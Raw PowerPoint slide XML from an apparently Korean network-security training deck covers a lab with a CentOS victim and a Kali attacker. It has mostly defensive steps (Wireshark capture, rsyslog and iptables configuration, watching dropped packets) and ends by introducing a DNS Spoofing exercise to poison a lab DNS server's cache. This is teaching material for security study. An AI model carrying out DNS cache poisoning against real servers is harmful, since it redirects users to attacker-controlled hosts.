              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B355687-60F8-4A97-9717-DF06525177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703" b="-400"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6394394" y="2199019"/>
            <a:ext cx="499434" cy="500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5E04B7BD-7FFA-4CF6-8896-A184055B3CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7178875" y="2105495"/>
            <a:ext cx="4432682" cy="838800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="accent2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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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실습</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2">
                    <a:lumMod val="7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환경</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent2">
                  <a:lumMod val="7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sv-SE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Victim : (CentOS 6.6 / 10.10.1.101) + DDWRT(10.10.1.1)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="sv-SE" altLang="ko-KR" sz="10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sv-SE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Attacker : (Kali Linux/ 10.10.1.166)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="화살표: 오른쪽 16">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81ED7C86-D7B4-4134-B0EF-1B7A83056B06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="580444" y="596349"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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BC968331-6BDC-4EF6-BD34-D24E17DAB382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110"/>
          </a:xfrm>
        </p:grpSpPr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B846F5E4-F54B-48E4-884D-8B11C27E605D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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1A05602-C5D7-4549-9695-4E18B65B363A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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21" name="화살표: 오른쪽 20">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B386215C-A1C0-4471-8A61-6BCBE3FCC914}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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2" name="Picture 2" descr="보안 아이콘 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FD9CA133-CDC3-42B0-8A32-4B3B8D6A50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74" t="12467" r="11967" b="12532"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="662681" y="3412409"/>
            <a:ext cx="565945" cy="562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334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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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 marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="6120000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 marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>icmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="3"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>서비스 재시작</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>rsyslog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> restart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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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6145" name="_x197190112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C635AA4A-42BE-4713-8D61-6772DBCDB1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180" y="679622"/>
            <a:ext cx="5400675" cy="364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_x197190192">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B2A8B92-7AFA-4DAF-80B5-1C187FC17A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1146" y="679622"/>
            <a:ext cx="5400675" cy="36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9" name="_x197189472">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4338795-C9B2-4338-8BED-76AA97A872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1146" y="4984484"/>
            <a:ext cx="5295900" cy="449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35572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화살표: 오른쪽 8">
            <a:hlinkClick r:id="" action="ppaction://noaction"/>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{36DC0363-5748-4238-A24E-3E0F461FCB92}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="134367" y="97585"/>
            <a:ext cx="257755" cy="206099"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 73148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2DF244-1E45-44A0-B32E-616FEC167CD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="392122" y="368998"/>
            <a:ext cx="5616792" cy="6120000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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4.  iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 수정</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># vi /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>sysconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/iptables</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="10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B02FE9C-319E-4A1A-B3F6-06CCEB53FD1E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="368998"/>
            <a:ext cx="5616792" cy="4795669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en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>5.  iptables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>수정한 값을 적용하기 위해 서비스 재시작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># service iptables restart</a:t>
            </a:r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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실시간으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>DROP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>되는 패킷을 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># tail –f /var/log/message </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000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4C33198-2E58-4A38-8153-C72034623E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11593737" y="6457890"/>
            <a:ext cx="678993" cy="400110"/>
            <a:chOff x="10627762" y="-30288"/>
            <a:chExt cx="597159" cy="400110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1BD440D7-A4B6-422E-BEF0-DA734161F7A3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10675841" y="11905"/>
              <a:ext cx="464911" cy="338139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C45BEB1-A639-4FC8-BFA8-B46B8EC4E337}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="10627762" y="-30288"/>
              <a:ext cx="5971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2">
                      <a:lumMod val="50000"/>
                    </a:schemeClr>
                  </a:solidFill>
                </a:rPr>
                <a:t>L I N K</a:t>
              </a:r>
              <a:endParaRPr lang="ko-KR" alt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8" name="화살표: 오른쪽 7">
              <a:hlinkClick r:id="" action="ppaction://noaction"/>
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70F00BAB-BC11-49E5-AFFF-32BB961D8637}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="10773860" y="150995"/>
              <a:ext cx="251325" cy="187144"/>
            </a:xfrm>
            <a:prstGeom prst="rightArrow">
              <a:avLst>
                <a:gd name="adj1" fmla="val 50000"/>
                <a:gd name="adj2" fmla="val 73148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7169" name="_x197190032">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7AA0C41A-5B19-4DF4-BF64-A7218AEDD5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984" y="910281"/>
            <a:ext cx="3573463" cy="160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_x197188592">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2408CFBA-BA48-420E-8CFA-FB6F9E82CA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180" y="1135933"/>
            <a:ext cx="5400675" cy="4418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3" name="_x197191152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17DFA826-4DDC-45BE-9B15-1CCB6D342F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5757" y="933300"/>
            <a:ext cx="5326063" cy="350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5" name="_x197191152">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3A566C9-EA6C-4436-9FD6-CCE738E6B9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1146" y="2023533"/>
            <a:ext cx="5400675" cy="3025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F30512B-1FD6-4022-AA7E-A2FEDB1B8E20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="5303756"/>
            <a:ext cx="5616792" cy="1185241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noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7177" name="_x197191792">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1A45113-677B-4426-9605-56BCF540D8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5757" y="5575184"/>
            <a:ext cx="3246438" cy="427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10371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">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3010DBED-3ABA-4169-8A96-F92BD8C53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sz="2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Training/Unit/Net/11</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 11. DNS Spoofing</a:t>
            </a:r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6A2CC12-A97B-4DB5-936F-E7C75CBB4AA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1496053" y="3328503"/>
            <a:ext cx="4432683" cy="2833758"/>
          </a:xfrm>
          <a:prstGeom prst="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ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="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대응</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" kern="0" spc="2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실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1200" b="1" kern="0" spc="200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent1">
                  <a:lumMod val="7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IP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주소가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10.10.1.14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인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DNS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서버가 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000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DNS Cache Poisoning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공격에 취약한 것으로 보인다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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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해당 서버 대상으로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DNS Spoofing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공격을 수행하여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</a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="10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DNS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서버의 캐시를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US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오염시키시오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  <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
